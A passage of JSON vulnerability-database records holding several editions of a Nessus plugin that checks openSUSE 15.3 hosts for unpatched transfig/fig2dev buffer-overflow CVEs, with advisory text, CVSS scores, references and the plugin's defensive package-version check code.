"p-cpe:/a:novell:opensuse:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-23T18:36:35", "differentElements": ["cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "OPENSUSE-2021-2454.NASL", "hash": "5b3c88fb9a9a0e8db25084891d37cf9e", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.2}, "href": "https://www.tenable.com/plugins/nessus/152011", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.suse.com/1161698", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1186329", "http://www.nessus.org/u?30d9d3a0", "https://www.suse.com/security/cve/CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2021-3561", "https://www.suse.com/security/cve/CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1143650"], "cvelist": ["CVE-2019-19746", "CVE-2019-19555", "CVE-2019-14275", "CVE-2021-3561", "CVE-2019-19797"], "immutableFields": [], "lastseen": "2021-07-29T02:16:39", "history": [], "viewCount": 170, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2020-1843.NASL", "FEDORA_2020-5D0F0593AE.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2020-1398.NASL", "AL2_ALAS-2021-1682.NASL", "DEBIAN_DLA-2073.NASL", "OPENSUSE-2020-1702.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2020-1806-1.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1"]}, {"type": "cve", "idList": ["CVE-2019-19555", "CVE-2019-19797", "CVE-2019-19746", "CVE-2019-14275", "CVE-2021-3561"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19746", "RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19555", "RH:CVE-2019-19797"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19555", "UB:CVE-2019-19797", "UB:CVE-2019-19746", "UB:CVE-2019-14275"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877392", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877387"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "fedora", "idList": ["FEDORA:983DF624CFF6", "FEDORA:9C4BF3072F18", "FEDORA:E540F6253477", "FEDORA:73FB862622DB", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-07-29T02:16:39", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-07-29T02:16:39", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152011", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152011);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RK4BRVCUPZKN5VS2JGWBPYITONWJCIZJ/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?30d9d3a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": ["cpe:/o:novell:opensuse:15.3", "p-cpe:/a:novell:opensuse:transfig"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-07-29T02:16:39", "differentElements": ["cpe", "cvss2", "cvss3", "cvssScoreSource", "description", "exploitEase", "patchPublicationDate", "references", "solution", "vpr", "vulnerabilityPublicationDate"], "edition": 2}, {"bulletin": {"id": "OPENSUSE-2021-2454.NASL", "hash": "560457f78caec6cafce5d93e334da442", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152011", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-14275", "https://bugzilla.suse.com/1143650", "https://bugzilla.suse.com/1186329", "https://www.suse.com/security/cve/CVE-2019-19746", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "https://bugzilla.suse.com/1159293", "https://www.suse.com/security/cve/CVE-2021-3561", "http://www.nessus.org/u?30d9d3a0", "https://bugzilla.suse.com/1161698", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://bugzilla.suse.com/1159130", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2019-19555", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://www.suse.com/security/cve/CVE-2019-19797"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-05T12:46:13", "history": [], "viewCount": 170, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FEDORA_2020-5D0F0593AE.NASL", "AL2_ALAS-2020-1398.NASL", "FEDORA_2020-6A2824178E.NASL", "SUSE_SU-2021-2454-1.NASL", "AL2_ALAS-2021-1682.NASL", "OPENSUSE-2020-1843.NASL", "DEBIAN_DLA-2073.NASL", "SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2020-1702.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2020:1843-1", "OPENSUSE-SU-2021:2454-1"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-3561", "RH:CVE-2019-19555", "RH:CVE-2019-19797", "RH:CVE-2019-19746", "RH:CVE-2019-14275"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-3561", "UB:CVE-2019-19746", "UB:CVE-2019-14275", "UB:CVE-2019-19797", "UB:CVE-2019-19555"]}, {"type": "cve", "idList": ["CVE-2019-19797", "CVE-2021-3561", "CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310892073", "OPENVAS:1361412562310877387", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877392"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "fedora", "idList": ["FEDORA:983DF624CFF6", "FEDORA:20E71304CBA3", "FEDORA:9C4BF3072F18", "FEDORA:73FB862622DB", "FEDORA:E540F6253477", "FEDORA:B794B627F4F0"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-08-05T12:46:13", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-08-05T12:46:13", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152011", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152011);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n \"CVE-2019-14275\",\n \"CVE-2019-19555\",\n \"CVE-2019-19746\",\n \"CVE-2019-19797\",\n \"CVE-2021-3561\"\n );\n\n script_name(english:\"openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in\nthe openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect\n sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because\n of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could\n allow an attacker to provide a crafted malicious input causing the application to either crash or in some\n cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as\n system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1143650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159130\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1159293\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1161698\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1186329\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/RK4BRVCUPZKN5VS2JGWBPYITONWJCIZJ/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?30d9d3a0\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-14275\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19555\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19746\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-19797\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-3561\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected transfig package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3561\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/07/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:transfig\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/SuSE/release');\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nos_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\nos_ver = os_ver[1];\nif (release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + os_ver, cpu);\n\npkgs = [\n {'reference':'transfig-3.2.8a-4.12.2', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n cpu = NULL;\n rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'transfig');\n}\n", "naslFamily": "SuSE Local Security Checks", "cpe": [], "solution": "Update the affected transfig package.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-3561", "vpr": {"risk factor": "Medium", "score": "5.2"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-07-22T00:00:00", "vulnerabilityPublicationDate": "2019-07-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-05T12:46:13", "differentElements": ["cpe"], "edition": 3}, {"bulletin": {"id": "OPENSUSE-2021-2454.NASL", "hash": "ae1046f023637ed1a6df3324407838fd", "type": "nessus", "bulletinFamily": "scanner", "title": "openSUSE 15 Security Update : transfig (openSUSE-SU-2021:2454-1)", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:2454-1 advisory.\n\n - Xfig fig2dev 3.2.7a has a stack-based buffer overflow in the calc_arrow function in bound.c.\n (CVE-2019-14275)\n\n - read_textobject in read.c in Xfig fig2dev 3.2.7b has a stack-based buffer overflow because of an incorrect sscanf. (CVE-2019-19555)\n\n - make_arrow in arrow.c in Xfig fig2dev 3.2.7b allows a segmentation fault and out-of-bounds write because of an integer overflow via a large arrow type. (CVE-2019-19746)\n\n - read_colordef in read.c in Xfig fig2dev 3.2.7b has an out-of-bounds write. (CVE-2019-19797)\n\n - An Out of Bounds flaw was found fig2dev version 3.2.8a. A flawed bounds check in read_objects() could allow an attacker to provide a crafted malicious input causing the application to either crash or in some cases cause memory corruption. The highest threat from this vulnerability is to integrity as well as system availability. (CVE-2021-3561)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-07-23T00:00:00", "modified": "2021-07-23T00:00:00", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152011", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.suse.com/security/cve/CVE-2019-19797", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19746", "https://bugzilla.suse.com/1143650", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19797", "https://www.suse.com/security/cve/CVE-2019-19746", "https://bugzilla.suse.com/1159293", "https://bugzilla.suse.com/1161698", "https://www.suse.com/security/cve/CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2021-3561", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14275", "https://bugzilla.suse.com/1159130", "https://bugzilla.suse.com/1186329", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19555", "https://www.suse.com/security/cve/CVE-2019-14275", "http://www.nessus.org/u?30d9d3a0"], "cvelist": ["CVE-2019-14275", "CVE-2019-19555", "CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561"], "immutableFields": [], "lastseen": "2021-08-06T13:21:46", "history": [], "viewCount": 170, "enchantments": {"dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2021:1143-1", "OPENSUSE-SU-2020:1702-1", "OPENSUSE-SU-2021:2454-1", "OPENSUSE-SU-2020:1843-1"]}, {"type": "nessus", "idList": ["SUSE_SU-2020-1806-1.NASL", "OPENSUSE-2021-1143.NASL", "FEDORA_2020-6A2824178E.NASL", "AL2_ALAS-2020-1398.NASL", "AL2_ALAS-2021-1682.NASL", "SUSE_SU-2021-2454-1.NASL", "DEBIAN_DLA-2073.NASL", "OPENSUSE-2020-1702.NASL", "OPENSUSE-2020-1843.NASL", "FEDORA_2020-5D0F0593AE.NASL"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-19555", "RH:CVE-2019-14275", "RH:CVE-2021-3561", "RH:CVE-2019-19746", "RH:CVE-2019-19797"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-14275", "UB:CVE-2019-19555", "UB:CVE-2021-3561", "UB:CVE-2019-19797", "UB:CVE-2019-19746"]}, {"type": "cve", "idList": ["CVE-2019-19746", "CVE-2019-19797", "CVE-2021-3561", "CVE-2019-19555", "CVE-2019-14275"]}, {"type": "fedora", "idList": ["FEDORA:E540F6253477", "FEDORA:9C4BF3072F18", "FEDORA:73FB862622DB", "FEDORA:B794B627F4F0", "FEDORA:20E71304CBA3", "FEDORA:983DF624CFF6"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310877387", "OPENVAS:1361412562310892073", "OPENVAS:1361412562310877359", "OPENVAS:1361412562310877368", "OPENVAS:1361412562310877392"]}, {"type": "amazon", "idList": ["ALAS2-2020-1398", "ALAS2-2021-1682"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2073-1:017FC"]}], "modified": "2021-08-06T13:21:46", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-08-06T13:21:46", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152011", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:2454-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152011);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/23\");\n\n script_cve_id(\n 